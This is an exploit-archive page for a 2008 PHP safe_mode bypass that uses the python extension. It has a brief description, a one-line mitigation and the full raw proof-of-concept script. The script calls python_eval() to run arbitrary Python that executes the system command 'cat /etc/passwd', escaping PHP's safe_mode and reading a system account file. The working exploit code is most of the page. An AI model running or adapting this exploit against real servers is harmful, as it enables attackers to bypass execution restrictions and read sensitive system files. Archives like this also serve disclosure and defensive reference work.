header-logo
Suggest Exploit
vendor:
N/A
by:
Amir Salmani
7.5
CVSS
HIGH
PHP Python Extension Safe_Mode Bypass
94
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

php_python_bypass.php

This exploit allows an attacker to bypass the safe_mode restriction in PHP by using the python extension. The exploit uses the python_eval() function to execute arbitrary python code, which can be used to execute system commands.

Mitigation:

Disable the python extension in php.ini or restrict access to the python_eval() function.
Source

Exploit-DB raw data:

<?php
/*
  php_python_bypass.php
  php python extension safe_mode bypass
  Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installed\n");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>

# milw0rm.com [2008-12-17]

Navigation

Suggest Exploit

Services By CQR